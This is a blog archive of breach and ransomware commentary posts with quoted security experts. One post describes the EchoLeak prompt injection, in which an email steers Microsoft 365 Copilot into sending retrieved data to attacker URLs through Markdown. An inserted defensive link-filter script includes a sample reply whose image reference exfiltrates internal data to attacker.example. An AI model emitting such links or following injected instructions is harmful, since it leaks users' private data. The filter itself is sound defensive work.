Archive for Hacked

DragonForce Threatens to Leak 830 GB of Strafford County NH Data 

Posted in Commentary with tags on June 16, 2025 by itnerd

This morning, ransomware gang DragonForce uploaded Strafford County, NH, to its data leak site, giving the US government entity just five days to meet its ransom demands before 830.03 GB of data is leaked.

In a blog post today, Rebecca Moody, Head of Data Research at Comparitech, commented:

“DragonForce gained notoriety this year after it attacked three UK retailers–Marks & Spencer, Co-op, and Harrods. Its attack on Marks & Spencer was particularly disruptive and is expected to cost the company around $400 million.”

“So far this year, DragonForce has claimed 66 attacks with eight of these being confirmed by the entity involved. Other DragonForce victims from previous years are still being confirmed, too, with one of the latest being IT services firm, GeoLogics Corporation. At the end of May 2025, it began notifying nearly 12,000 of a breach that stemmed from a cyber attack way back in December 2023. Here, DragonForce alleged to have stolen nearly 123 GB of data.”

“DragonForce operates a ransomware-as-a-service business whereby affiliates use its malware to encrypt systems and take a percentage of the ransom payments in return. Like most gangs today, DragonForce employs a double-extortion tactic where it demands two ransoms: one to decrypt systems and another to delete stolen data. Throughout 2025, we’ve tracked 30 confirmed attacks on US government entities and are monitoring a further 31 unconfirmed.”

One thing to keep in mind is that even if they pay the ransom, there’s zero guarantee that data will be deleted and said data won’t be leaked anyway. That’s why preventing the bad guys from getting to the point of holding your data for ransom is critical.

Zoomcar Gets Pwned… But At Least They Admitted To It Quickly

Posted in Commentary with tags on June 16, 2025 by itnerd

Zoomcar Holdings, a peer-to-peer car-sharing marketplace, has disclosed that unauthorized access to its systems led to a data breach impacting 8.4 million users.

On June 9, 2025, Zoomcar Holdings, Inc. (the “Company”) identified a cybersecurity incident involving unauthorized access to its information systems. The Company became aware of the incident after certain employees received external communications from a threat actor alleging unauthorized access to Company data. Upon discovery, the Company promptly activated its incident response plan.

Based on preliminary findings, the Company determined that an unauthorized third party accessed a limited dataset containing certain personal information of a subset of approximately 8.4 million users, including names, phone numbers, car registration numbers, personal addresses and email addresses associated with such users. At this time, there is no evidence that financial information, plaintext passwords, or other sensitive identifiers were compromised.

In response to the incident, the Company has taken immediate actions to contain the threat and enhance its security posture. These measures include implementing additional safeguards across the cloud and internal network, increasing system monitoring, and reviewing access controls. The Company is also engaging with third-party cybersecurity experts to further assist with the investigation. The Company has also notified the appropriate regulatory and law enforcement authorities and is cooperating fully with their inquiries.

To date, the incident has not resulted in any material disruption to the Company’s operations. However, the Company continues to evaluate the scope and potential impacts of the event, including legal, financial, and reputational considerations, as well as any associated remediation costs.

Paul Bischoff, Consumer Privacy Advocate at Comparitech:

“Although this was a large breach, the information compromised does not pose a direct threat to victims’ accounts or finances. Victims should be on the lookout for targeted phishing messages and scams via text and email. Those messages might pretend to be from Zoomcar or a related company. Never click on links or attachments in unsolicited emails and texts.”

Chris Hauk, Consumer Privacy Champion at Pixel Privacy:

“First of all, bravo to Zoomcar for quickly alerting the public to the breach. Luckily, no credit card, debit card, or other financial information was exposed in the breach. However, Zoomcar customers do need to stay alert for any attempts to open new accounts in their name and to especially stay alert for phishing attempts where bad actors use the information they were able to obtain to pry more information from customers that can be used to breach accounts.”

Roger Grimes, Data-Driven Defense Evangelist at KnowBe4:

“Everyone’s information, including the information taken by the Zoomcar theft, has been stolen multiple times over the years. I’m not sure how valuable it is to cybercriminals in either use or in selling, but the top risk scenario is some sort of phishing scam where someone fraudulently posing as Zoomcar tries to use the potential victim’s relationship with Zoomcar as a means to further compromise the victim. And for sure, scammers with information like that are more likely to be successful than with just sending out a generic phish with no “insider information.” Zoomcar customers need to pay attention to the breach announcement and use increased caution anytime someone supposedly from Zoomcar reaches out to them. History is replete with previous examples of compromised information being used to successfully phish the involved customers at a later date.”

Another day, another breach that may affect millions. Welcome to the new normal where some company getting pwned will result eventually in something bad happening to you. That’s not good and seriously needs to change.

But at least Zoomcar admitted to it quickly… I guess.

Journalists From The Washington Post Have Had Their Email Accounts Hacked

Posted in Commentary with tags on June 16, 2025 by itnerd

It is being reported that a cyberattack on the Washington Post compromised the email accounts of several journalists and was potentially the work of a foreign government.

Bleeping Computer has more details: Washington Post’s email system hacked, journalists’ accounts compromised

Roger Grimes, data-driven defense evangelist at cybersecurity company KnowBe4, commented:

“Attacks against journalists are a serious problem. In most cases, the journalist has to click on a rogue link and somehow get tricked into running the malware. However, there are many commercial surveillance vendors (CSVs) with many zero-days that require zero clicks by the targeted journalist. This is a very serious problem and the cybersecurity world is trying to come to grips with how to treat CSVs who create and deploy zero-click zero-days. It’s a real problem that our industry is just starting to try and grapple with. It’s not helped when different governments, even our own government and its allies, also use these services. When they do, it’s harder to say do as I say but not as I do.”

I have the feeling that this will not be the last time that we will see a headline like this. Threat actors, especially nation-state-backed threat actors, will see this as open season on journalists, and you’ll see other high-profile journalists, who are already targets for hacks, targeted even more.

UPDATE: Paul Bischoff, Consumer Privacy Advocate at Comparitech had this to say: 

“Unauthorized access to reporters’ emails could put journalists and their sources at risk. It could also allow attackers to hack into other accounts registered to the email address. I hope the Washington Post works as quickly as possible to notify sources and other data subjects who might be affected so they can take steps to protect themselves.”

Chris Hauk, Consumer Privacy Champion at Pixel Privacy follows with this:

“Currently, it appears that only emails were compromised. HOWEVER, MANY Microsoft accounts also use OneDrive cloud storage, which usually use the same credentials, so we could find out that files stored in the cloud could also have been compromised. Luckily, the Post employees use Slack in place of email to communicate, as well as the encrypted Signal for messaging. Hopefully this has also helped keep the damage minimal.”

Medical software maker Episource data breach leaks thousands of patients’ private health info

Posted in Commentary with tags on June 13, 2025 by itnerd

Medical software company Episource this week began notifying victims of a January 2025 data breach that compromised medical records and health insurance info. Sharp Healthcare, an Episource client in California, is also notifying patients of the breach. Episource has not disclosed how many victims it notified nationwide, but the Texas Attorney General reports 24,259 people were notified of the breach in that state alone.

In a blog post reporting this news, Paul Bischoff, Consumer Privacy Advocate at Comparitech, wrote:

“In 2025 to date, Comparitech has logged three confirmed ransomware attacks on US healthcare-related businesses that do not provide direct care to patients. Attacks on these companies can have far-reaching consequences for hospitals, clinics, and other direct care providers that use them. Last year, 29 such attacks compromised nearly 193 million records. Ransomware gangs in 2025 so far have made another 24 unconfirmed attack claims against healthcare-related companies that haven’t been publicly acknowledged by the targeted companies.”

“As for direct care providers like hospitals and clinics, Comparitech researchers have logged 27 confirmed ransomware attacks in 2025 so far, compromising more than 1.9 million records. Ransomware attacks on healthcare providers can cripple critical systems and endanger the health, privacy, and security of patients. Targeted companies must pay a ransom or face extended downtime, data loss, and putting patients and staff at increased risk of fraud. Hospitals and clinics might have to resort to pen and paper, cancel appointments, and divert patients elsewhere until systems are restored.”

Yet again I am reporting on another health care breach. That continues not to be a good thing, as it underscores how vulnerable this space is. Changing this in a different direction has to be a priority.

First Zero-Click AI Vulnerability Enables Data Exfiltration From MS365 Copilot

Posted in Commentary with tags on June 11, 2025 by itnerd

Researchers have discovered the first zero-click AI vulnerability, dubbed “EchoLeak,” that allows attackers to automatically exfiltrate sensitive and proprietary information from M365 Copilot’s context without the user’s awareness and without relying on any specific victim behavior. Termed an “LLM Scope Violation,” the technique may have additional manifestations in other RAG-based chatbots and AI agents, and represents a major advance in how threat actors can attack AI agents: by leveraging the model’s internal mechanics rather than a bug in the surrounding application.

More details here: https://www.aim.security/lp/aim-labs-echoleak-blogpost

Ensar Seker, CISO at SOCRadar had this to say:

“The EchoLeak discovery by Aim Labs exposes a critical shift in cybersecurity risk, highlighting how even well-guarded AI agents like Microsoft 365 Copilot can be weaponized through what Aim Labs correctly terms an “LLM Scope Violation.” This attack, which allows zero-click data exfiltration from an AI assistant’s context simply by sending an email, breaks from traditional breach tactics as it doesn’t require any user action beyond receiving mail. The fact that it bypasses server-side classifiers and markdown redaction rules demonstrates how these vulnerabilities are baked into agent-level logic, not just surface UI flows. 

“This has serious implications for NATO, government, defense, healthcare, and anyone using enterprise AI assistants: attackers no longer need to compromise user credentials or rely on phishing. They can manipulate a trusted AI interface directly. The multi-step EchoLeak chain is both elegant and insidious: it leverages retrieval-augmented generation (RAG), content-security-policy quirks, and markdown behavior to funnel data out silently to attacker-controlled URLs. 

“What stands out especially is that this isn’t limited to Copilot. As Aim Labs warns, any RAG-based agent that processes untrusted inputs alongside internal data is vulnerable to scope violations. This signals a broader architectural flaw across the AI assistant space – one that demands runtime guardrails, stricter input scoping, and inflexible separation between trusted and untrusted content.

“Organizations deploying AI agents must act quickly: disable external email ingestion in Copilot, enforce DLP tags, and apply prompt-level filters that block structured output or suspicious links. They should also treat every AI deployment with the same scrutiny reserved for enterprise applications integrating AI-specific security controls into DevSecOps and threat modeling. Insecure guards at the model layer are now as critical a risk as insecure interfaces at the network layer.

“EchoLeak is a watershed moment. It shows that AI agents can be their own attackers, and secure-by-design principles must evolve just as AI shifts from assistant to agent.”

Well, this isn’t good given the fact that AI is being deployed everywhere for everything. I think it’s a safe bet that we’ll be seeing more of this type of exploit going forward, and the danger of these sorts of exploits will only quickly increase.
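The quote above recommends "prompt-level filters that block structured output or suspicious links". What follows is an added example of such an output-side guard, written for this page; it is not Aim Labs' or Microsoft's code and not part of the original post. The allow-listed hosts, the constructed sample reply, and the use of a reference-style Markdown image as the smuggling vehicle are all assumptions of the example. The idea it demonstrates is the general one the post describes: once untrusted text has been pulled into the assistant's context, any URL the model emits can carry retrieved data in its query string, and an image reference is fetched by the renderer without a click, so every link in a reply must be checked against an allow-list before the reply is rendered, whatever Markdown form it takes.

```python
"""Output-side link guard for a RAG assistant's Markdown reply (added example).

Every URL the model emitted is extracted from inline links/images, from
reference-style definitions ("[label]: url", used later as "![alt][label]"),
and from bare or angle-bracketed autolinks. Anything pointing off the
allow-list is redacted and reported, because a fetched image or a clicked
link can carry retrieved context to an attacker-controlled host.
"""
from __future__ import annotations

import re
from urllib.parse import urlsplit

# Hosts this tenant trusts its assistant to link to (assumption for the example).
ALLOWED_HOSTS = {"contoso.sharepoint.com", "teams.microsoft.com"}

# Inline form: [text](url) or ![alt](url), with an optional title after the URL.
_INLINE = re.compile(r"!?\[[^\]]*\]\(\s*(?P<url>[^)\s]+)[^)]*\)")
# Reference-style definition on its own line: [label]: url
_REFDEF = re.compile(r"^\s*\[[^\]]+\]:\s*(?P<url>\S+)", re.MULTILINE)
# Bare URL or autolink <https://...>; also re-matches URLs inside the forms above.
_BARE = re.compile(r"<?(?P<url>https?://[^\s<>)\]]+)>?")

_PLACEHOLDER = "[external link removed]"


def extract_urls(markdown: str) -> list[str]:
    """All distinct link targets in the reply, in order of first appearance."""
    urls: list[str] = []
    for rx in (_INLINE, _REFDEF, _BARE):
        for m in rx.finditer(markdown):
            url = m.group("url").rstrip(".,;")
            if url not in urls:
                urls.append(url)
    return urls


def is_external(url: str) -> bool:
    """True unless the URL is http(s) to an exact allow-listed host.

    Non-http schemes (javascript:, data:) are never acceptable in a reply, and
    the host is compared whole, so "contoso.sharepoint.com.evil.example" fails.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return True
    return (parts.hostname or "") not in ALLOWED_HOSTS


def carries_payload(url: str) -> bool:
    """True if the URL has a query string or fragment, i.e. room to smuggle text."""
    parts = urlsplit(url)
    return bool(parts.query or parts.fragment)


def _redact(m: re.Match) -> str:
    # Drop the whole Markdown construct, not just the URL, so the renderer has
    # nothing to fetch and nothing to click.
    return _PLACEHOLDER if is_external(m.group("url")) else m.group(0)


def filter_reply(markdown: str) -> tuple[str, list[str]]:
    """Return the redacted reply plus the external URLs found, for alerting."""
    findings = [u for u in extract_urls(markdown) if is_external(u)]
    out = markdown
    for rx in (_INLINE, _REFDEF, _BARE):
        out = rx.sub(_redact, out)
    return out, findings


# Constructed sample, not a real Copilot reply: the retrieved context was poisoned
# by an inbound email, and the model was steered into emitting a reference-style
# image whose query string carries a line of internal data.
SAMPLE_REPLY = """Here is the Q3 summary you asked for.

Revenue guidance was revised to $4.2B (internal, do not forward).

![chart][c1]

[c1]: https://attacker.example/px.png?d=Revenue%20guidance%20revised%20to%20%244.2B
See also [the deck](https://contoso.sharepoint.com/sites/fin/Q3.pptx).
"""

if __name__ == "__main__":
    cleaned, bad = filter_reply(SAMPLE_REPLY)
    print(cleaned)
    for url in bad:
        print("BLOCKED:", url, "(payload-bearing)" if carries_payload(url) else "")
```

The allow-listed SharePoint link survives intact; the reference definition is replaced, so the leftover `![chart][c1]` renders as plain text rather than an image request. Run the findings list into whatever alerting path already watches the assistant, since a reply that tried to reach an unknown host is itself evidence that something in the retrieved context was hostile.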

There’s A New Ransomware Gang On The Block To Worry About

Posted in Commentary with tags on June 11, 2025 by itnerd

Warlock, a new ransomware gang, today claimed credit for a spate of cyber-attacks that hit several government agencies from around the world. The group claimed responsibility for 16 cyber-attacks in the past month, and about half those hit government agencies and departments. 

In a blog post reporting this news, Paul Bischoff, Consumer Privacy Advocate at Comparitech, wrote:

“Also known as Warlock Dark Army, Warlock is a newer ransomware strain operated by cybercriminals. Once infected, Warlock encrypts data to make it inaccessible, then demands a ransom for the decryption key. It also steals data that it can use to extort targets by threatening to release private information.”

“Warlock could be connected to another ransomware group called Black Basta, which stopped claiming new attacks in January 2025. Warlock took credit for two attacks that Black Basta previously claimed against Arch-Con Corporation and Lactanet.”

“Comparitech researchers have tracked 79 confirmed ransomware attacks on government entities worldwide in 2025 to date. In 2024, we logged 199 such attacks in total. The average ransom demand is just over $2.4 million.”

“Ransomware attacks on government agencies and departments can both steal data and lock down computer systems. The attacker then demands a ransom to delete the stolen data and in exchange for a key to recover infected systems. If the target doesn’t pay, it could take weeks or even months to restore systems, data could be lost forever, and people whose data was stolen are put at greater risk of fraud.”

My stories on ransomware gangs never seem to end. I say that because I just finished writing about these guys, and now there’s a new gang on the block. This illustrates how out of control ransomware is and why urgent action is needed to get things in a better place.

Dermatologists of Birmingham Is The Latest To Be Pwned By Qilin

Posted in Commentary with tags on June 11, 2025 by itnerd

Dermatologists of Birmingham this week confirmed it notified 86,414 people of a March 2025 data breach that compromised the following personal info:

  • Names
  • Social Security numbers
  • Addresses
  • Email addresses
  • Phone numbers
  • Dates of birth
  • Medical diagnoses and treatments
  • Health insurance info

Ransomware gang Qilin claimed responsibility for the attack, saying it stole 141 GB of data from the Alabama skin care practice; however, the company has not verified Qilin’s claim.

In a blog post reporting this news, Paul Bischoff, Consumer Privacy Advocate at Comparitech, wrote:

“Qilin is a ransomware gang that began claiming responsibility for attacks on its data leak site in late 2022. Based in Russia, Qilin mainly targets victims through phishing emails to spread its ransomware. It launched in August 2022 and runs a ransomware-as-a-service business in which affiliates pay to use Qilin’s malware to launch attacks and collect ransoms.”

“Qilin took credit for 31 confirmed ransomware attacks in 2025 to date, plus 221 unconfirmed attack claims that haven’t been acknowledged by the targeted organizations. Hospitals and clinics are frequent targets for Qilin and other ransomware gangs. Last week, Next Step Healthcare confirmed it notified more than 12,000 people of a June 2024 data breach claimed by Qilin. The group also recently took credit for confirmed attacks on a hospital in Spain and an eye surgeon in Hungary.”

“Comparitech researchers have logged 27 confirmed ransomware attacks on US healthcare companies in 2025 so far, compromising more than 1.9 million records. Ransomware attacks on US hospitals, clinics, and other care providers can cripple critical systems and endanger the health, privacy, and security of patients. Hospitals must pay a ransom or face extended downtime, data loss, and putting patients and staff at increased risk of fraud. Hospitals and clinics might have to resort to pen and paper, cancel appointments, and divert patients elsewhere until systems are restored.”

Qilin is on a rampage, as the long string of previous examples I have written about shows. That’s a lot, and it shows how dangerous this ransomware gang is. So organizations should consider themselves warned and take whatever measures are required to avoid being pwned by them.

FIN6 Hackers Impersonate Job Seekers to Phish Recruiters

Posted in Commentary with tags on June 10, 2025 by itnerd

Researchers have uncovered a novel twist to employment scams in which hackers, in this case FIN6 (aka “Skeleton Spider”), impersonate job seekers with fake resumes to lure recruiters rather than posing as recruiters to lure job applicants.

By posing as job seekers and initiating conversations through platforms like LinkedIn and Indeed, the group builds rapport with recruiters before delivering phishing messages that lead to malware. More details can be found here:

https://dti.domaintools.com/Skeleton-Spider-Trusted-Cloud-Malware-Delivery/

Erich Kron, security awareness advocate at KnowBe4, commented:

“This is an interesting twist to the common recruiting scam and is especially dangerous because the attackers take time to build a rapport with the recruiter before springing the trap. It’s wise to be suspicious of email or text messages that are unsolicited or unexpected, but in this case, the recruiters do expect to receive correspondence and documents, and the back-and-forth conversation builds the trust the attackers need to execute the malware.

“In any organization, there are going to be departments that deal with outside communications, and these departments should be trained and educated about how to handle potentially dangerous attachments or links. It’s also good to remind employees not to let their guard down as they get comfortable in a conversation.”

Threat actors are getting more and more crafty. That means you have to get more and more suspicious of anything and everything that hits your inbox to avoid something really bad happening to you.

Optima Tax Relief Pwned By The Chaos Group

Posted in Commentary with tags on June 9, 2025 by itnerd

Optima Tax Relief was hit by a ransomware attack by Chaos group threat actors who are now leaking 69 GB of data stolen from the company. Bleeping Computer has details:

Today, the Chaos ransomware gang added Optima Tax Relief to its data leak site, claiming to have stolen 69 GB of data. 

This data contains what appears to be corporate data and customer case files. Tax documents commonly contain sensitive personal information, such as Social Security numbers, phone numbers, and home addresses, which can be used for malicious activity by other threat actors or identity theft.

Sources with knowledge of the attack told BleepingComputer that this was a double-extortion attack, with the threat actors not only stealing data from the company but also encrypting servers.

Ensar Seker, CISO at SOCRadar:

“The Optima Tax Relief breach underscores the growing interest of ransomware groups like Chaos in targeting high-trust financial service providers that handle sensitive personal data. This isn’t just a business disruption issue, it’s a national identity risk.

“Tax resolution firms like Optima are rich targets because they aggregate the full spectrum of personally identifiable information (PII): Social Security numbers, tax documents, financial disclosures, and often even power-of-attorney authorization records. When exfiltrated, this data doesn’t just enable identity theft, it fuels secondary fraud operations for years.

“The fact that this was a double-extortion attack, involving both encryption and data theft, is unfortunately now the standard playbook. What’s more concerning is that Chaos ransomware has only recently emerged, yet already demonstrates the operational maturity of a seasoned group. Their ability to launch effective attacks and publicize breaches so quickly suggests they’re leveraging pre-existing access-as-a-service networks or recycled stealer logs for rapid compromise.

“From a defender’s standpoint, this is a call to action: Organizations that handle financial or tax data need to treat endpoint telemetry, privileged access management, and data exfiltration detection as minimum baselines. And more broadly, this reinforces the importance of having not only an incident response plan but a breach communications plan tailored for sensitive customer-impact scenarios.”

Erich Kron, Security Awareness Advocate at KnowBe4:

“The Chaos ransomware group is fairly new on the scene but has claimed a few victims already. This victim is an interesting one due to the significant amount and types of data that were collected and likely stolen. The customers will have provided not only Social Security numbers and other personal information, but also a lot of personal and sensitive financial information that may be embarrassing and that they may not want to be made public. The type of information stolen could also be used by social engineers to convince victims that they are from Optima and may lead to future scams and financial losses.

“The specific attack vector has not been released, but generally speaking, ransomware is most often spread through attacks on the humans within organizations, such as email phishing, vishing, or smishing. For this reason it is very important for organizations to have a robust and well-planned human risk management (HRM) program in place.”

This is an attack that will not end well. Not for Optima, and not for their customers. Expect this hack to reverberate for months or longer.

Grocery wholesale giant United Natural Foods hit by cyberattack

Posted in Commentary with tags on June 9, 2025 by itnerd

United Natural Foods (UNFI), North America’s largest publicly traded wholesale distributor, was forced to shut down some systems following a recent cyberattack. The Rhode Island-based company operates 53 distribution centers and delivers fresh and frozen products to over 30,000 locations across the United States and Canada:

On June 5, 2025, United Natural Foods, Inc. (the “Company”) became aware of unauthorized activity on certain of its Information Technology (IT) systems. The Company promptly activated its incident response plan and implemented containment measures, including proactively taking certain systems offline, which has temporarily impacted the Company’s ability to fulfill and distribute customer orders. The incident has caused, and is expected to continue to cause, temporary disruptions to the Company’s business operations. The Company is working actively to assess, mitigate, and remediate the incident with the assistance of third-party cybersecurity professionals and has notified law enforcement. Pursuant to its business continuity plans, the Company has implemented workarounds for certain operations in order to continue servicing its customers where possible. The Company is continuing to work to restore its systems to safely bring them back online.

The investigation to assess the impact and scope of the incident remains ongoing and is in its early stages.

Erich Kron, Security Awareness Advocate at KnowBe4:

“Operations such as this often work on a very tight timeline, so the pressure can be high to get systems up and running as soon as possible. This is what attackers hope for as they dangle the idea in front of the victims that paying the ransom will get organizations back online quickly. While decrypting the data could possibly restore operations more quickly, there is a huge danger that back doors are left in place to be exploited again, or that after payment, encrypted files turn out to be corrupted and unrecoverable.”

“Not only do attacks such as these really put the pressure on the victim, but the organizations that rely on the products are also put in a spot as well. If the wholesaler can’t get items to the retailer, the retailer suffers greatly as well and might look for other options to make future purchases, costing the wholesaler customers and their reputation.”

“Since the vast majority of ransomware attacks are started by exploiting employees, organizations should have a robust human risk management program in place to address threats such as social engineering, poor credential hygiene, and other human-centric threats.”

Paul Bischoff, Consumer Privacy Advocate at Comparitech:

“Although UNFI hasn’t stated as much, this attack has all the hallmarks of ransomware. Ransomware attacks can lock down computer systems, forcing companies to pay a ransom or face extended downtime and permanent data loss. These attacks can cripple companies and even force them to shut down permanently in some cases, so they should not be taken lightly. This attack could have knock-on effects including higher food prices for consumers.”

Chris Hauk, Consumer Privacy Champion at Pixel Privacy:

“Cyberattacks like the one UNFI has been hit with can cause delays in deliveries, product shortages, and even store closings and temporary layoffs, due to organizations’ reliance on computer systems. While we don’t know exactly what type of attack has been launched against UNFI or how it was launched, it does emphasize how companies need to ensure that their internal systems, as well as those of their suppliers and partners, are kept up to date to plug security holes.”

I for one would like to see more details disclosed: what happened, what the downstream effects are, and what UNFI will do to ensure that it doesn’t happen again. That will enable its business partners and the public to trust it going forward.